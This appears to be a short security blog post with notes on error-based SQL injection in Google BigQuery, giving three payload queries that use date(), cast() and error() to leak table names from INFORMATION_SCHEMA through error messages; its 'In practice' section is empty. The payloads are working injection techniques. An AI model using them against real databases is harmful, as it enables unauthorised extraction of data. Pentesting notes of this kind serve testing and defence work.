Exploiting Error Based BigQuery Injection

Here's my quick notes when exploiting error-based BigQuery injection today. In short, BigQuery has a lot of functions can evaluate sub-query and return results to error message.

SELECT (date((SELECT table_name FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES` LIMIT 1)))

SELECT (cast ((SELECT table_name FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES` LIMIT 1) as INT64))

SELECT (error((SELECT string_agg(table_name) FROM `bigquery-public-data.austin_bikeshare.INFORMATION_SCHEMA.TABLES`)))

In practice

Nhận xét

Bài đăng phổ biến từ blog này

[Steganography] Kỹ thuật che dấu thông tin - Phần 2

PHP Race Condition Vulnerability Example

[Steganography] Kỹ thuật che dấu thông tin - Phần 1